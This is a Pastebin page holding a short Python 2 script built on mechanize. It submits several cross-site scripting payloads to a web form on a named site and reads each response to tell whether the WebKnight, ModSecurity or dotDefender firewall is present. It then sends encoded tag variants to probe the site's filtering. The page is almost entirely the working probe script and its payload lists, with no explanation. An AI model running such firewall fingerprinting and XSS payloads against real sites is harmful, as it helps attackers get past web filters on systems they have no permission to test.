Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import mechanize as mec
- maliciousRequest = mec.Browser()
- formName = 'waf'
- maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
- maliciousRequest.select_form(formName)
- crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
- maliciousRequest.form['data'] = crossSiteScriptingPayLoad
- maliciousRequest.submit()
- response = maliciousRequest.response().read()
- print response
- if response.find('WebKnight') >= 0:
- print "Firewall detected: WebKnight"
- elif response.find('Mod_Security') >= 0:
- print "Firewall detected: Mod Security"
- elif response.find('Mod_Security') >= 0:
- print "Firewall detected: Mod Security"
- elif response.find('dotDefender') >= 0:
- print "Firewall detected: Dot Defender"
- else:
- print "No Firewall Present"
- listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt( 1)<i>', '<a href="javascript:alert(1)">CLICK ME<a>']
- for payLoads in listofPayloads:
- maliciousRequest = mec.Browser()
- formName = 'waf'
- maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
- maliciousRequest.select_form(formName)
- maliciousRequest.form['data'] = payLoads
- maliciousRequest.submit()
- response = maliciousRequest.response().read()
- print "---------------------------------------------------"
- if response.find('WebKnight') >= 0:
- print "Firewall detected: WebKnight"
- elif response.find('Mod_Security') >= 0:
- print "Firewall detected: Mod Security"
- elif response.find('Mod_Security') >= 0:
- print "Firewall detected: Mod Security"
- elif response.find('dotDefender') >= 0:
- print "Firewall detected: Dot Defender"
- else:
- print "No Firewall Present"
- print "---------------------------------------------------"
- listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e']
- for payLoads in listofPayloads:
- maliciousRequest = mec.Browser()
- formName = 'waf'
- maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
- maliciousRequest.select_form(formName)
- maliciousRequest.form['data'] = payLoads
- maliciousRequest.submit()
- response = maliciousRequest.response().read()
- print "---------------------------------------------------"
- print response
- print "---------------------------------------------------"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement